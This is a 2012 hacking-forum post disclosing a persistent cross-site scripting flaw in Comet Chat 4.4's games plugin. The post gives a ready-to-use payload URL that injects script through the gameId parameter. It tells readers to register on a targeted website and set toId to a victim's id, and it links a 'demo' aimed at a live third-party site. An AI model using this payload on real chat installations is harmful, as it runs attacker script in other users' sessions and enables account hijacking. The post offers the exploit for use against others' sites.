Jump to content
B3st

Comet chat 4.4 persistent xss

By B3st, in Exploituri

Recommended Posts

B3st Newbie

B3st

Posted
Posted

#############################

##Discovered by: 001

#############################

## 05.12.2012

#############################

##Application: Comet Chat 4.4

#############################

##hackyard.net and trojanforge.com

#############################

cometchat/plugins/games/index.php?action=request&[COLOR="#FF0000"]toId[/COLOR]=1&gameId=');"><script>alert('Hackyard.net')</script>Sudoku<!--&gameWidth=1337

It may also work in comet chat 4.6 or other version, but i didn't tested.

You need to make one new account in targeted website.

Then you can use this xss like this: (toId = target id)

Demo:

http://www.opensc.ws/chat/plugins/games/index.php?action=request&[COLOR="#FF0000"]toId[/COLOR]=1&gameId=');"><script>alert('Hackyard.net')</script>Sudoku<!--&gameWidth=1337

  • Upvote 1

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...